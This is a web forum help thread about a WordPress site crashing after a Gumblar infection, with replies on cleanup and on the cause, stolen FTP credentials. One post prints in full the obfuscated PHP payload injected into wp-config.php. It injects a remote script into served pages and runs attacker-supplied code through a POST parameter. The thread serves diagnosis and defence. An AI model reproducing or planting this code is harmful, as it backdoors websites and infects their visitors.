Site crash FATAL ERROR please help

Sounds as if something has been injected into your index.php and wp-config.php, at the top.

Take a look at the index.php and wp-config.php file and see if there is anything odd in them.

Same things happened to my blogs a few times this week! I’ve fixed them and then it happens again.

Same thing happened to me twice in the last week. Both times the following was added to wp-config.php :

<?php eval(base64_decode('aWYoIWlzc2V0KCRnYmExKSl7ZnVuY3Rpb24gZ2JhKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM05wWjJNdVpXUjFMMmxuTDAxQ1FWOURiMjF3YkdGcGJtTmxYM0psY0c5eWRDNXRlVjlrYjJNdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBnYmEyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGdiYTE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGdiYTEpKWNhbGxfdXNlcl9mdW5jKCRnYmExLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2diYScpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdnYmEnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kZ2JhbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignZ2JhMicpKSE9J2diYTInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>

which gave the error:

Fatal error: Cannot redeclare gba() (previously declared in /home/blablabla/index.php(1) : eval()’d code:1) in /home/blablabla/wp-settings.php(1) : eval()’d code on line 1

It was a fresh install of 2.8.4. Overwriting all the files with a new download of 2.8.4 and removing that injection code from wp-config sorted it out. But it appears to only be a temporary fix.

Does anyone know how to fix it for good?

I’m on shared hosting.

Thanks!

gwynf,

I would like to speak to you about installing a plugin that might help track down the source of your problem. if you are interested contact me at [email protected]

actually, this looks like it might be a joomla attack also. so maybe your problem isnt specifically a wordpress issue. I spose I dont really know though.

Thanks, there is a Joomla installation on the same server…

Your email “[email protected]” doesn’t work though.

i know, sorry, I dont use that very often.

i would make sure your joomla install isnt the source of the problem though.

in which case my corrected email addy wont be neccessary.

[email protected]

my bad.

These errors are results of buggy Gumblar scripts that doesn’t take into account WordPress architecture.

The attack uses stolen FTP credentials and uploads backdoor scripts that can be used to reinfect compromised sites.

Details here:
https://blog.unmaskparasites.com/2009/11/04/gumblar-breaks-wordpress-blogs-and-other-complex-php-sites/

UseShots, that’s exactly it. Very interesting stuff, great link, much obliged.

I ended up re-installing from a backup on a completely different server. I’ve scanned my system for malware with a couple of programs and I always use SFTP, so I suspect it was the other guy (in Peru) using an infected computer. Time will tell. Thanks again.